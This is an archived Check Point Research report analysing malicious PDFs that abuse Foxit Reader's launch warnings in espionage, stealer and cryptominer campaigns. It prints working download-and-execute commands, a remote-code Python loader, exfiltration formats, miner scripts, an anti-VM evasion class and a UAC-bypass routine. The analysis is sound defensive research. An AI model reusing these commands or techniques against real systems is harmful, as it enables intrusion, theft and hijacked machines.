{
	"id": "f342ea89-f516-4726-bcd5-0f1200f6cc5d",
	"created_at": "2026-04-06T00:09:39.04261Z",
	"updated_at": "2026-04-10T03:33:03.126373Z",
	"deleted_at": null,
	"sha1_hash": "1fca8044e90d64caed80b8a16fab8749dbc8168e",
	"title": "Foxit PDF “Flawed Design” Exploitation - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 257554,
	"plain_text": "Foxit PDF “Flawed Design” Exploitation - Check Point Research\nBy antoniost@checkpoint.com\nPublished: 2024-05-14 · Archived: 2026-04-05 17:48:20 UTC\nResearch by: Antonis Terefos\nIntroduction\nPDF (Portable Document Format) files have become an integral part of modern digital communication. Renowned for their universality and fidelity, PDFs offer a robust platform for sharing documents across diverse computing environments. PDFs have evolved into a standard format for presenting text, images, and multimedia content with consistent layout and formatting, irrespective of the software, hardware, or operating system used to view them. This versatility has made PDFs indispensable in fields ranging from business and academia to government and personal use, serving as a reliable means of exchanging information in a structured and accessible manner.\nIn the realm of PDF viewers, Adobe Acrobat Reader reigns supreme as the industry’s dominant player. However, while Adobe Acrobat Reader holds the biggest market share, notable contenders are vying for attention, with Foxit PDF Reader being a prominent alternative. Foxit PDF Reader has more than 700 million users located in more than 200 countries, with significant customers in the government sector, such as the US Air Force, Army, Navy \u0026 Missile Defense Agency, as well as in the technological sector, such as Google, Microsoft, Intel \u0026 Dell.\nCheck Point Research has identified an unusual pattern of behavior involving PDF exploitation, mainly targeting users of Foxit Reader. This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands. Check Point Research has observed variants of this exploit being actively utilized in the wild. Its low detection rate is attributed to the prevalent use of Adobe Reader in most sandboxes or antivirus solutions, as Adobe Reader is not susceptible to this specific exploit. 
Additionally, Check Point Research has observed various exploit builders, ranging from those coded in .NET to those written in Python, being used to deploy this exploit.\nThis exploit has been used by multiple threat actors, from e-crime to espionage. The campaigns have taken advantage of the low detection rate and weak protection against this exploit; actors have been spotted sharing those malicious PDF files even through nontraditional means such as Facebook. Check Point Research isolated and investigated three in-depth cases, ranging from an espionage campaign with a military focus to e-crime with multiple links and tools, achieving impressive attack chains.\nThe “Flawed Design”\nCheck Point Research discovered that samples from EXPMON produced unusual behavior when executed with Foxit Reader compared to Adobe Reader. The exploitation of victims occurs through a flawed design in Foxit Reader, which presents “OK” as the default option of its warnings; this could lead the majority of targets to ignore those messages and execute the malicious code. The malicious command is executed once the victim “Agrees” to the default options twice.\nThe victim scenario is shown below. When opening the file, we come across the first pop-up, with the default option “Trust once,” which is the correct approach.\nFigure 1 – First pop-up warning.\nOnce clicking “OK”, the target comes across a second pop-up. Even if there were any chance the targeted user would read the first message, the second would be “Agreed” without reading. 
This is the flawed logic and common human behavior the threat actors take advantage of: the default choice offered is the most “harmful” one.\nFigure 2 – The second pop-up warning has “Open” as the default option.\nAttaching a debugger, we can observe the executed command, which uses PowerShell to download and execute a malicious file.\nFigure 3 – Triggered Malicious command.\nExecuted Command:\n\"C:\\Windows\\System32\\cmd.exe\" /c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')\" \u003e\u003e msd89h2j389uh.bat \u0026@echo timeout /t 5 \u003e\u003e msd89h2j389uh.bat \u0026@echo start payload.exe \u003e\u003e msd89h2j389uh.bat \u0026@echo Set oShell = CreateObject (\"Wscript.Shell\") \u003e\u003e encrypted.vbs \u0026@echo Dim strArgs \u003e\u003e encrypted.vbs \u0026@echo strArgs = \"cmd /c msd89h2j389uh.bat\" \u003e\u003e encrypted.vbs \u0026@echo oShell.Run strArgs, 0, false \u003e\u003e encrypted.vbs \u0026 encrypted.vbs \u0026dEl encrypted.vbs\nCode 1 – Command Executed.\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\nPage 1 of 32\nAnalyzing the PDF file statically, we can obtain the executed logic behind it.\n.\\pdf-parser.py .\\mlw.pdf\nPDF Comment '%PDF-1.1\\r\\n'\nobj 1 0\n Type: /Catalog\n Referencing: 2 0 R\n \u003c\u003c\n /OpenAction\n \u003c\u003c\n /S /Launch\n /Win\n \u003c\u003c\n /F (CMD)\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\\', \\'payload.exe\\')\"'\n \u003e\u003e\n msd89h2j389uh.bat \u0026@echo timeout\n / t 5\n \u003e\u003e\n msd89h2j389uh.bat \u0026@echo start payload.exe\n \u003e\u003e\nobj 2 0\n Type: /Pages\n Referencing: 3 0 R\n \u003c\u003c\n /Kids [ 3 0 R ]\n /Count 1\n /Type /Pages\n \u003e\u003e\nobj 3 0\n Type: /Page\n Referencing: 5 0 R, 2 0 R, 4 0 R\n \u003c\u003c\n /Resources\n \u003c\u003c\n /Font\n \u003c\u003c\n /F1 5 0 R\n \u003e\u003e\n \u003e\u003e\n /MediaBox [ 0 0 795 842 ]\n /Parent 2 0 R\n /Contents 4 0 R\n /Type /Page\n \u003e\u003e\nobj 4 0\n Type:\n Referencing:\n Contains stream\n \u003c\u003c\n /Length 1260\n \u003e\u003e\nobj 5 0\n Type: /Font\n Referencing:\n \u003c\u003c\n /Subtype /Type1\n /Name /F1\n /BaseFont /Helvetica\n /Type /Font\n \u003e\u003e\nxref\ntrailer\n \u003c\u003c\n /Size 6\n /Root 1 0 R\n /ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]\n \u003e\u003e\nstartxref 1866\nPDF Comment '%%EOF'\nCode 2 – PDF static analysis.\nThe initial link, which references the root of the PDF, is shown using the key /Root. In this case, it points to object 1. Following this object, we can observe the key /OpenAction, which by itself doesn’t indicate malicious activity. This is a key in a PDF file’s catalog dictionary. 
It specifies an action to be performed automatically when the document is opened.\nThe next keys are responsible for the execution of the command: /S /Launch indicates to Foxit Reader that it should launch an external application, and /Win provides the information needed for the launched application. Later, the keys /F and /P provide the application to execute and its parameters.\nThis sequence of keys triggers the two previous warnings in Foxit Reader, and with the flawed design and careless users, it is able to execute malicious commands, which appears to be highly leveraged by threat actors. Meanwhile, the key /Launch appears not to be triggered for Adobe Reader.\nCampaigns utilizing PDF Exploit\nCheck Point Research collected a plethora of malicious PDF files taking advantage of the specific exploit targeting Foxit Reader users. Because the majority of sandboxes and VirusTotal fail to trigger the exploit, given Adobe’s prevalence as the primary PDF Reader, numerous files from previous campaigns remained unretrieved. Nonetheless, we acquired a sufficient amount of dropped payloads from various origins, revealing a diverse range of malicious tools within the infection chain and prominent malware families such as:\nVenomRAT\nAgent-Tesla\nRemcos\nNjRAT\nNanoCore RAT\nPony\nXworm\nAsyncRAT\nDCRat\nWe meticulously isolated and conducted in-depth research on particular instances where the initial PDF samples resulted in interesting campaigns. Through the analysis, we aimed to uncover unique insights into the nature and mechanisms of these infections.\nCase I. Windows \u0026 Android Botnets with a Scent of Espionage\nWhile researching, we stumbled upon a malicious PDF file with a suspicious “military” related name, “Regarding Invitation to attend defence services Asia 2024 and National Security Asia 2024.pdf”. 
The PDF was possibly distributed via a download link. The campaign’s attack chain is simple: the PDF downloads and executes a downloader of two executables, which later collect and upload various files such as Documents, Images, Archives, and Databases.\nFigure 4 – Attack Chain.\nCommand \u0026 Control\nThe downloader provides no functionality other than downloading and executing the two payloads, and the information sent to the C\u0026C, which registers the bot, only displays the victims that received the following stage payloads.\nFigure 5 – Downloader’s Control Panel, Bot information.\nBased on the creation date of those “bot-registration” files, we obtained the campaign dates and the number of Bots added to the Botnet per day. The primary campaign appears to have occurred on April 5, 2024, which is the day with the most registered bots.\nFigure 6 – Registered Bots per Day.\nThe attack chain and the use of specific tools point to a campaign focused on espionage, and further findings of Android infections using Rafel RAT support this assumption even further. Based on the obtained victim data, the Threat Actor has the capability of performing hybrid campaigns, which also resulted in a Two Factor Authentication (2FA) bypass. 
Check Point Research considers these campaigns to have been performed by the APT-C-35 / DoNot Team.\nWindows Campaign Technical Analysis\nThe PDF document was still hosted on the C\u0026C, suggesting it could be downloaded using a download link instead of being sent as a file to potential victims.\nFigure 7 – Distributing Server Open-directory.\nCheck Point Research analyzed the specific PDF document and discovered it was built using an open-source PDF Builder released on February 13, 2024. The command used once the “exploit” is triggered downloads an executable file from a remote server and executes it.\n /S /Launch\n /Win\n \u003c\u003c\n /F (cmd.exe)\n /P '(/c cD %tEMP% \u0026@echo powershell -Command \"(New-Object Net.WebClient).DownloadFile(\\'hxxps://omagle-chat-secure.com/target.exe\\', \\'payload.exe\\')\"'\n \u003e\u003e\n msd89h2j389uh.bat \u0026@echo timeout\n / t 5\nCode 3 – Command downloading malicious payload.\nMachine Information\nThe executed downloader collects machine information and writes it into “%Appdata%/TestLog/$PC_Name.txt”:\nComputer name\nUser name\nIP Address\nOS Version\nString decryption\nThe malware contains strings important to its functionality, which are encrypted with a custom algorithm.\nFigure 8 – Decryption Algorithm.\nimport string\n\ndef downloader_decrypt_string(encrypted: bytes, key: int) -\u003e bytes:\n    # Shift only ASCII letters back by `key` positions within their case (a Caesar cipher);\n    # every other byte is passed through unchanged.\n    result = []\n    for char in encrypted:\n        if chr(char) in string.ascii_letters:\n            base = ord(\"A\") if char \u003c= ord(\"Z\") else ord(\"a\")\n            char = (char - base - key + 0x1A) % 0x1A + base\n        result.append(char)\n    return bytes(result)\n\n\u003e\u003e b'APPDATA'\n\u003e\u003e b'\\\\Intel\\\\index.exe'\n\u003e\u003e b'\\\\Intel\\\\upload.exe'\n\u003e\u003e b'hxxps://mailservicess.com/res/data/in.exe'\n\u003e\u003e b'hxxps://mailservicess.com/res/data/up.exe'\n\u003e\u003e b'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run'\n\u003e\u003e b'TailoredExperiencesWithDiagnosticDataEnabled'\n\u003e\u003e b'ghijkl/ghijkl'\n\u003e\u003e b'/index.php'\n\u003e\u003e b'mailservicess.com'\n\u003e\u003e b'\\\\Systems.exe'\n\u003e\u003e b'Systems.exe'\n\u003e\u003e b'\\\\Mozila\\\\'\nCode 4 – Python representation and decrypted strings.\nNetwork communication\nThe downloader has an unusual approach to retrieving the data that will be sent. It enumerates the files inside the folder %Appdata%/TestLog/ and uploads them to the C\u0026C: hxxps://mailservicess.com/ghijkl/ghijkl/index.php\nContent-Type: multipart/form-data; boundary=----qwerty\n------qwerty\nContent-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\nComputer Name: $PC_NAME\nIP Address: $IP_ADDRESS\nUser Name: $USER_NAME\nOperating System Version: $VERSION\n------qwerty--\nAfter registering the bot to the C\u0026C, it downloads two payloads and stores them as %Appdata%/Intel/index.exe and %Appdata%/Intel/upload.exe. 
Both are executed with the parameter “pp”, with a “big” time difference between each other.\nPersistence\nThe malware copies itself to %Appdata%/Intel/Mozila/Systems.exe and sets a Run registry key under “SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run” named “TailoredExperiencesWithDiagnosticDataEnabled” whose value is the copied path.\nDownloaded Payloads\nThe first payload, “in.exe”, stored as “index.exe”, does not contain any network-related functionality. It is used for listing files inside the specific root directories C:\\\\, D:\\\\, E:\\\\, F:\\\\, G:\\\\, H:\\\\, I:\\\\ and Z:\\\\ and copies files with the below extensions to the folder %AppData%/htdocs/.\n.txt, .jpeg, .jpg, .png, .doc, .docx, .xls, .xlsx, .pdf, .ppt, .zip, .rar, .inp, .pptx, .sql\nA text summary of all copied files will be created at %AppData%/output.exe.\nThe second payload, “up.exe”, stored as “upload.exe”, is executed some time after the first payload and uses a string decryption similar to the downloader’s.\nimport string\n\ndef uploader_decrypt_string(encrypted: bytes) -\u003e bytes:\n    # Same idea as the downloader: ASCII letters are rotated within their case, everything else\n    # is left as is. The multiply-and-shift by 0x4EC4EC4F is the compiler's way of dividing by 26,\n    # so the arithmetic reduces to (char - base_byte) % 0x1A + base_byte + 0x17.\n    result = []\n    for char in encrypted:\n        if chr(char) in string.ascii_letters:\n            base_byte = 0x2A if char \u003c= ord(\"Z\") else 0x4A\n            char -= base_byte\n            temp = ((0x4EC4EC4F * char) \u003e\u003e 32) \u003e\u003e 3\n            char = char - 0x1A * ((temp \u003c 0) + temp) + (base_byte + 0x17)\n        result.append(char)\n    return bytes(result)\n\n\u003e\u003e b'mailservicess.com'\n\u003e\u003e b'filetoupload'\n\u003e\u003e b'/filedata/'\n\u003e\u003e b'/index.php'\n\u003e\u003e b'mailservicess.com'\n\u003e\u003e b'filetoupload'\n\u003e\u003e b'APPDATA'\n\u003e\u003e b'\\\\htdocs\\\\'\nCode 5 – Python representation and decrypted strings.\nThe uploader enumerates the files from %Appdata%/htdocs/ and uploads them to the C\u0026C using the same network communication used by the downloader.\n------qwerty\nContent-Disposition: form-data; name=\"filetoupload\"; filename=\"$FILEPATH\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n$FILE_DATA\n------qwerty--\nThe group has used those two downloaded payloads, but through further research, we discovered another tool that could be dropped depending on the interests of the group. The internal tool names are:\n1. indexer, which copies and makes a summary of files of interest.\n2. upload, a tool that uploads the previous files.\n3. screen, a tool that takes screenshots and saves them to the same folder to be picked up by upload.\nBased on the analyzed tools, we believe that further undiscovered tools could exist that serve different needs, such as stealers, which would drop their results into the mentioned folder so the upload tool could send them to the C\u0026C.\nCheck Point Research also observed evidence of other malware and tooling from directories discovered on the C\u0026C, but we haven’t managed to obtain any samples that could further verify our findings. The folders we discovered were:\n1. /AhMyth/, an open-source Android RAT.\n2. /sliver/, an open-source cross-platform red team framework similar to Cobalt Strike.\n3. /Keres/, a PowerShell reverse-shell backdoor with persistence for Windows and Linux.\nCase II. Chained-Campaign\nThis campaign chains multiple links to follow, commands, and files executed in order, resulting in a stealer and two miners. The initial part of the infection chain was achieved with a malicious PDF document targeting Foxit PDF Reader users. The file’s name is “swift v2.pdf”, possibly mainly targeting users from the United States, among other countries.\nFigure 9 – Attack Chain.\nTo this day, the PDF file still has a low detection rate among antivirus solutions, posing an even bigger threat. 
In one of the campaigns, the Threat Actor also distributed it via Facebook, passing undetected by the social media platform’s malware detectors.\nFigure 10 – VirusTotal low detection rate of PDF file.\nCampaign Technical Analysis\nAnalyzing statically, the command triggered is cmd.exe, and the malicious BAT file is downloaded by executing curl.\n /OpenAction\n \u003c\u003c\n /S /Launch\n /Win\n \u003c\u003c\n /F '(c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\cmd.exe)'\n /P '(/c curl hxxps://sealingshop.click/bat/bostar4 -o \"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat\" \u0026 C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\mems.bat)'\n \u003e\u003e\n \u003e\u003e\nCode 6 – Command Executed once accepted.\nThe malicious payload opens the browser on a Facebook page; we are not exactly sure what this action is for, possibly to distract the user from the malicious activities about to be performed or from the empty PDF page. We managed to obtain similar BAT payloads that open different legitimate pages, such as Amazon. 
One hypothesis could be that the website opened indicates the platform where the users were targeted.\ncmd /c start https://www.facebook.com/help/contact/1304188393453553?ref=payout_hub\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://sealingshop.click/config/stu -OutFile \"C:\\\\Users\\\\$([Environment]::UserName)\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\'Start Menu'\\\\Programs\\\\Startup\\\\WindowsUpdate.bat\"\ncmd /c mkdir \"C:\\\\Users\\\\Public\\\\python39\"\ncmd /c curl hxxps://sealingshop.click/app/python39.zip -o \"C:\\\\Users\\\\Public\\\\python39\\\\python39.zip\"\ncmd /c tar -xf C:\\\\Users\\\\Public\\\\python39\\\\python39.zip -C \"C:\\\\Users\\\\Public\\\\python39\"\ncmd /c curl hxxps://sealingshop.click/py/bostar4 -o \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\ncmd /c C:\\\\Users\\\\Public\\\\python39\\\\python.exe \"C:\\\\Users\\\\Public\\\\python39\\\\documents.py\"\nCode 7 – “First Payload”.\nThe “First payload” downloads a second BAT file and stores it in the %Startup% folder as WindowsUpdate.bat to maintain persistence. On reboot, the machine will execute a Python file using PowerShell.\ncmd /c C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden C:\\\\Users\\\\Public\\\\python39\\\\python C:\\\\Users\\\\Public\\\\python39\\\\documents.py;\nCode 8 – Command downloaded using PowerShell, used for persistence.\nOnce it has dropped the persistence BAT file, the “First payload” downloads and “installs” Python 3.9 at C:\\\\Users\\\\Public\\\\python. 
At this point, it is even clearer that the final payload will be a Python file, which is downloaded again using curl and then executed.\nimport os\nimport base64\nimport sqlite3\nimport win32crypt\nfrom Crypto.Cipher import AES\nimport requests\nimport json\nimport getpass\nimport sys\nvari = ''\n# First stage: the base64 blob decodes to a one-liner that fetches the next stage into `vari`\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]]('dmFyaSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly9zZWFsaW5nc2hvcC5jbGljay9weWVuL2Jvc3RhcjQnKS50ZXh0')))\n# Second stage: the downloaded code is decoded and executed\nexec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]](vari)))\nCode 9 – Python Loader.\nThis Python file is a Loader that executes dynamically downloaded code. The first exec call will download an obfuscated Python info stealer and Miner dropper, and the second exec will execute it. This info stealer targets only Chrome and Edge browsers and steals the user’s credentials and cookies. In order to retrieve the actual C\u0026C, the malware makes a GET request and then a POST to /up/cookie-password-all with the user’s Personal Identifiable Information (PII).\nFigure 11 – Actual C\u0026C.\nFor “closing”, the malware makes two last GET requests to retrieve the actual URL for the miners to drop. 
Using PowerShell commands, it downloads, unzips and executes the miners.
os.system('cmd /c mkdir "C:\\Users\\Public\\PublicAlbums"')
os.system("powershell.exe -windowstyle hidden Invoke-WebRequest -URI " + url_miner_xmrig + " -OutFile C:\\Users\\Public\\PublicAlbums\\xmrig.zip")
os.system("powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\PublicAlbums\\xmrig.zip -DestinationPath C:\\Users\\Public\\PublicAlbums")
os.system("cmd /c C:\\Users\\Public\\PublicAlbums\\config.vbs")
Code 10 – The same code is used for Lol Miner.
Both miners are stored on GitLab (@topworld20241), and both ZIP archives contain the file to be executed, config.vbs, with the instructions and configuration of each miner.
Figure 12 – Malicious GitLab project. (All commits at GMT+1 timezone)
Sub Main()
    Dim WShell,objFSO
    Set WShell = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists("C:\\Users\\Public\\PublicAlbums\\xmrig.exe") Then
        WShell.Run "C:\\Users\\Public\\PublicAlbums\\xmrig.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -u ZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV -p workerbot -a rx/0 -k", 0
        Set WShell = Nothing
    End If
End Sub
On Error Resume Next
Main
Code 11 – VB script for XMRig Miner.
Sub Main()
    Dim WShell,objFSO
    Set WShell = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists("C:\\Users\\Public\\PublicSounds\\lolMiner.exe") Then
        WShell.Run "C:\\Users\\Public\\PublicSounds\\lolMiner.exe --algo NEXA --pool stratum+ssl://nexapow.unmineable.com:4444 --user ZEPH:ZEPHsCVJBy21Z2qvE7JpbwDgsQCzPqyV58KWAZ2qzVYAjPh4bsjrGB7W6DkTuUy4p5Kk75dUyvBtgH3jpspeQUbnR8ZMYL7wDcV --watchdog exit !EXTRAPARAMETERS!", 0
        Set WShell = Nothing
    End If
End Sub
On Error Resume Next
Main
Code 12 – VB script for Lol Miner.
Case III. Python Stealer with Low Detection
Another way of delivering the malicious end file could be more direct, such as downloading the malicious file from DiscordApp and executing it. This was the case with the below PDF infection chain downloading a malicious Python file.
Figure 13 – Blank-Grabber low detection rate
Python files are not the usual suspects, as the low detection rate testifies; even more striking is that this Python stealer is an open-source project called Blank-Grabber and not newly discovered malware.
Campaign Technical Analysis
The PDF executes PowerShell and downloads the malicious file from DiscordApp, resulting in "legitimate"-looking network traffic.
</gr_repl
ace>
<gr_replace lines="33-43" cat="reformat" orig="The Python malware">
The Python malware is then downloaded as lol.pyw and executed on the victim's machine.
/OpenAction
 <<
  /S /Launch
  /Win
   <<
    /F (CMD)
    /P '(/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\'hxxps://cdn.discordapp.com/attachments/1167576449859993683/1168168071366709278/lol.pyw\', \'lol.pyw\')"' >> msd89h2j389uh.bat &@echo timeout / t 5 >> msd89h2j389uh.bat &@echo start stub.pyw >>
Code 13 – PDF executed command.
The malware is functional and possesses many features, from a graphical builder to UAC bypass, anti-VM, and stealing capabilities for various browsers and applications.
Figure 14 – Features as listed on the GitHub project.
What is interesting to see is the class VmProtect, which lists all the anti-VM techniques, from identifying known:
1. UUIDs,
2. Computer names,
3. User names,
4. Registry keys & values,
5. Killing running tasks related to virtual machines or any other malware-reversing tools,
6. Making Internet-related checks regarding the emulation of the network and checking if the system is hosted online.
import os
import subprocess
from threading import Thread
from urllib3 import PoolManager
# Logger and Utility are helper classes defined elsewhere in the project; they are not part of this excerpt.

class VmProtect:
    BLACKLISTED_UUIDS = ('7AB5C494-39F5-4941-9163-47F54D6D5016', '032E02B4-0499-05C3-0806-3C0700080009',
        '03DE0294-0480-05DE-1A06-350700080009', '11111111-2222-3333-4444-555555555555',
        '6F3CA5EC-BEC9-4A4D-8274-11168F640058', 'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',
        '4C4C4544-0050-3710-8058-CAC04F59344A', '00000000-0000-0000-0000-AC1F6BD04972',
        '00000000-0000-0000-0000-000000000000', '5BD24D56-789F-8468-7CDC-CAA7222CC121',
        '49434D53-0200-9065-2500-65902500E439', '49434D53-0200-9036-2500-36902500F022',
        '777D84B3-88D1-451C-93E4-D235177420A7', '49434D53-0200-9036-2500-369025000C65',
        'B1112042-52E8-E25B-3655-6A4F54155DBF', '00000000-0000-0000-0000-AC1F6BD048FE',
        'EB16924B-FB6D-4FA1-8666-17B91F62FB37', 'A15A930C-8251-9645-AF63-E45AD728C20C',
        '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3', 'C7D23342-A5D4-68A1-59AC-CF40F735B363',
        '63203342-0EB0-AA1A-4DF5-3FB37DBB0670', '44B94D56-65AB-DC02-86A0-98143A7423BF',
        '6608003F-ECE4-494E-B07E-1C4615D1D93C', 'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',
        '49434D53-0200-9036-2500-369025003AF0', '8B4E8278-525C-7343-B825-280AEBCD3BCB',
        '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27', '79AF5279-16CF-4094-9758-F88A616D81B4',
        'FE822042-A70C-D08B-F1D1-C207055A488F', '76122042-C286-FA81-F0A8-514CC507B250',
        '481E2042-A1AF-D390-CE06-A8F783B1E76A', 'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',
        '9961A120-E691-4FFE-B67B-F0E4115D5919')
    BLACKLISTED_COMPUTERNAMES = ('bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr', 'b30f0242-1c6a-4',
        'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb', 'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc',
        'john-pc', 'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc', 'work', '6c4e733f-c2d9-4',
        'ralphs-pc', 'desktop-wg3myjs', 'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',
        'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076', 'desktop-vkeons4', 'NTT-EFF-2W11WSS')
    BLACKLISTED_USERS = ('wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex', 'john-pc', 'rdhj0cnfevzx',
        'keecfmwgj', 'frank', '8nl0colnq5bq', 'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',
        'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl', 'harry johnson', 'j.seance', 'a.monaldo', 'tvm')
    BLACKLISTED_TASKS = ('fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler', 'vboxservice', 'df5serv',
        'vboxtray', 'vmtoolsd', 'vmwaretray', 'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',
        'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc', 'prl_tools', 'xenservice', 'qemu-ga',
        'joeboxcontrol', 'ksdumperclient', 'ksdumper', 'joeboxserver', 'vmwareservice', 'vmwaretray',
        'discordtokenprotector')

    @staticmethod
    def checkUUID() -> bool:
        # Compares the SMBIOS product UUID reported by WMI against known sandbox/VM values.
        Logger.info('Checking UUID')
        uuid = subprocess.run('wmic csproduct get uuid', shell=True, capture_output=True).stdout.splitlines()[2].decode(errors='ignore').strip()
        return uuid in VmProtect.BLACKLISTED_UUIDS

    @staticmethod
    def checkComputerName() -> bool:
        Logger.info('Checking computer name')
        computername = os.getenv('computername')
        return computername.lower() in VmProtect.BLACKLISTED_COMPUTERNAMES

    @staticmethod
    def checkUsers() -> bool:
        Logger.info('Checking username')
        user = os.getlogin()
        return user.lower() in VmProtect.BLACKLISTED_USERS

    @staticmethod
    def checkHosting() -> bool:
        # Asks a public geo-IP service whether the egress IP belongs to a hosting provider.
        Logger.info('Checking if system is hosted online')
        http = PoolManager(cert_reqs='CERT_NONE')
        try:
            return http.request('GET', 'http://ip-api.com/line/?fields=hosting').data.decode(errors='ignore').strip() == 'true'
        except Exception:
            Logger.info('Unable to check if system is hosted online')
            return False

    @staticmethod
    def checkHTTPSimulation() -> bool:
        # A request to a random, non-existent host should fail; success means the network is being simulated.
        Logger.info('Checking if system is simulating connection')
        http = PoolManager(cert_reqs='CERT_NONE', timeout=1.0)
        try:
            http.request('GET', f'https://blank-{Utility.GetRandomString()}.in')
        except Exception:
            return False
        else:
            return True

    @staticmethod
    def checkRegistry() -> bool:
        # Display-adapter registry entries, the GPU name from WMI and a few sandbox-specific directories.
        Logger.info('Checking registry')
        r1 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2', capture_output=True, shell=True)
        r2 = subprocess.run('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2', capture_output=True, shell=True)
        gpucheck = any((x.lower() in subprocess.run('wmic path win32_VideoController get name', capture_output=True, shell=True).stdout.decode(errors='ignore').splitlines()[2].strip().lower() for x in ('virtualbox', 'vmware')))
        dircheck = any([os.path.isdir(path) for path in ('D:\\Tools', 'D:\\OS2', 'D:\\NT3X')])
        return r1.returncode != 1 and r2.returncode != 1 or gpucheck or dircheck

    @staticmethod
    def killTasks() -> None:
        Utility.TaskKill(*VmProtect.BLACKLISTED_TASKS)

    @staticmethod
    def isVM() -> bool:
        Logger.info('Checking if system is a VM')
        Thread(target=VmProtect.killTasks, daemon=True).start()
        result = VmProtect.checkHTTPSimulation() or VmProtect.checkUUID() or VmProtect.checkComputerName() or VmProtect.checkUsers() or VmProtect.checkHosting() or VmProtect.checkRegistry()
        if result:
            Logger.info('System is a VM')
        else:
            Logger.info('System is not a VM')
        return result
Code 14 – VM protect class.
Another interesting part is the function that results in a UAC bypass, def UACbypass.
    @staticmethod
    def UACbypass(method: int=1) -> bool:
        if Utility.GetSelf()[1]:
            execute = lambda cmd: subprocess.run(cmd, shell=True, capture_output=True)
            match method:
                case 1:
                    # Register the current interpreter as the ms-settings handler, run computerdefaults, then clean up.
                    execute(f'reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /d "{sys.executable}" /f')
                    execute('reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f')
                    # Defender's operational log is counted before and after; growth means the attempt was flagged.
                    log_count_before = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout)
                    execute('computerdefaults --nouacbypass')
                    log_count_after = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout)
                    execute('reg delete hkcu\\Software\\Classes\\ms-settings /f')
                    if log_count_after > log_count_before:
                        return Utility.UACbypass(method + 1)
                case 2:
                    # Same handler hijack, this time triggered through fodhelper.
                    execute(f'reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /d "{sys.executable}" /f')
                    execute('reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f')
                    log_count_before = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout)
                    execute('fodhelper --nouacbypass')
                    log_count_after = len(execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').stdout)
                    execute('reg delete hkcu\\Software\\Classes\\ms-settings /f')
                    if log_count_after > log_count_before:
                        return Utility.UACbypass(method + 1)
                case _:
                    return False
        return True
Code 15 – UAC bypass function.
